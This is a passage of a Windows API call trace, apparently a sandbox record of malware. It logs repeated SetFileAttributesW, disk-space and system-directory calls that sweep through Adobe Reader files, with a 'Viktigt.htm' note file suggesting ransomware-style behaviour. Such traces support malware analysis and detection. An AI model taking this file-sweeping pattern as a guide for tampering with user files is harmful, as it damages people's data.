(x86)\\Adobe\\Reader 10.0\\Viktigt.htm", dwFileAttributes=0x80) returned 1 [0107.058] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.058] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.058] CoTaskMemFree (pv=0x506980) [0107.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.059] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.059] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.059] CoTaskMemFree (pv=0x506980) [0107.061] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0107.064] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest", dwFileAttributes=0x80) returned 1 [0107.077] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0107.291] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\PDFSigQFormalRep.pdf", dwFileAttributes=0x80) returned 1 [0107.299] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0107.302] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pmd.cer", dwFileAttributes=0x80) returned 1 [0107.306] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0107.309] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RTC.der", dwFileAttributes=0x80) returned 1 [0107.312] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.312] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.312] CoTaskMemFree (pv=0x506980) [0107.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.318] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.318] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.318] CoTaskMemFree (pv=0x506980) [0107.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.327] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.327] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.328] CoTaskMemFree (pv=0x506980) [0107.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.332] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.332] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.332] CoTaskMemFree (pv=0x506980) [0107.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.334] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.344] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.346] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.355] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.358] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.358] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.359] CoTaskMemFree (pv=0x506980) [0107.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.360] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.375] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.447] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.450] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.450] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.450] CoTaskMemFree (pv=0x506980) [0107.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.451] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.456] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.459] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.464] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.467] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.467] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.467] CoTaskMemFree (pv=0x506980) [0107.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.469] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.478] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.493] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.496] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.496] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.496] CoTaskMemFree (pv=0x506980) [0107.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.497] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.505] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.507] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.516] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.519] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.519] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.519] CoTaskMemFree (pv=0x506980) [0107.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.520] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.530] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.534] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.543] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.546] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.546] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.546] CoTaskMemFree (pv=0x506980) [0107.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.547] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.557] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.559] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.569] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.572] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.572] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.572] CoTaskMemFree (pv=0x506980) [0107.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.573] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.583] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.586] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.597] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.600] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.600] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.600] CoTaskMemFree (pv=0x506980) [0107.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.600] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.600] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.600] CoTaskMemFree (pv=0x506980) [0107.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.601] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.610] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.612] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.622] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.625] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.625] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.625] CoTaskMemFree (pv=0x506980) [0107.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.625] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.630] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.632] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.639] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.642] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.642] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.642] CoTaskMemFree (pv=0x506980) [0107.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.644] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.653] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.655] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.666] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.669] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.669] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.669] CoTaskMemFree (pv=0x506980) [0107.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.670] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.678] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.681] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.696] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.699] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.699] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.699] CoTaskMemFree (pv=0x506980) [0107.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.700] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.713] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.716] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.725] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.727] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.727] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.727] CoTaskMemFree (pv=0x506980) [0107.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.728] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.733] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.735] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.745] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.747] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.747] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.748] CoTaskMemFree (pv=0x506980) [0107.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.749] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.757] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.759] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.768] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.770] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.770] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.771] CoTaskMemFree (pv=0x506980) [0107.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.772] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.780] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: 